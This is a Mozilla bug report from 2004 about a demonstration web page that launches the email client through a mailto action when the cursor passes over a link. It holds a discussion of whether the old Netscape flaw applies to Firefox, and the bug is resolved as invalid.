Closed Bug 248920 Opened 20 years ago Closed 20 years ago

Cursor movement on Web Page starts Email Client

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows 98
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: DaveMcA, Assigned: bugs)

References

(
URL
)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7) Gecko/20040614 Firefox/0.9

With Javascript enabled, passing cursor over line containing "Completely Safe
Link - Trust Me" will start email client - Eudora 4.3. Disabling Javascript
prevents program from starting.

Reproducible: Always
Steps to Reproduce:
1. Go to http://www.digicrime.com/noprivacy.html using Firefox/0.9 with
Javascript enabled.
2. Pass cursor over line (no necessarily the words) containing "Completely Safe
Link - Trust Me"


Actual Results:  
1) Message box came up stating "You probably just sent mail ..."
2) Email client started - Eudora 4.3 started with new mail addressed to
"mcc@digicrime.com" 

Expected Results:  
Nothing.

I do not believe the mail was accually sent but that may have been due to my
settings within Eudora.
Modern mail clients don't send mail immediately in response to mailto forms. 
They usually bring up a mail composition window, letting you inspect or modify
the message before sending it.
Group: security
Summary: Cursor movement on Web Page starts other programs (Email Client) → Cursor movement on Web Page starts Email Client
-> invalid
The page intends to demonstrate an old security flaw in Netscape, which doesn't
apply to us.
Severity: major → normal
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Component: Web Site → General
Resolution: --- → INVALID
*** Bug 294453 has been marked as a duplicate of this bug. ***
(In reply to comments #1 and #2)

>Modern mail clients don't send mail immediately in response to mailto forms. 
>They usually bring up a mail composition window, letting you inspect or modify
>the message before sending it.

Yes thats how they're supposed to work, it should just display a blank message
and not send anything. When I tested it, Thunderbird opened up a blank
composition window but didnt send anything, so just to make sure, I switched the
default to Outlook Express and it did manage to somehow send a blank message to
the mailto link in the script. It may be because of my settings in Thunderbird
that it didnt send the message but I can't be too sure. 

> -> invalid
> The page intends to demonstrate an old security flaw in Netscape, which
>doesn't apply to us.

I partially disagree. Yes, it was originally a flaw in Netscape and that is
exactly what that page was meant to demonstrate, im not arguing that at all.
But, and correct me if I am wrong, I was/am under the assertion that any
vulnerability most certainly applies to us if it can be exploited on a
non-netscape Mozilla build, which is firefox in this case.
You need to log in before you can comment on or make changes to this bug.